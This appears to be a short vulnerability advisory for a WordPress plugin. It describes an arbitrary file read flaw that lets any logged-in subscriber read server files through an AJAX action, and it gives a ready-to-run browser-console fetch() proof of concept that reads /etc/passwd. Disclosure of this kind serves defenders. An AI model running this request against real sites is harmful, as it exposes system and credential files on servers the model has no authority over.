The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server.
Run the below command in the developer console of the web browser while being on the blog as subscriber user fetch("/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": 'action=wel_check_progress_ajax&progressfile=/etc/passwd', "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
2022-12-05 (about 5 months ago)
2022-12-06 (about 5 months ago)
2022-12-06 (about 5 months ago)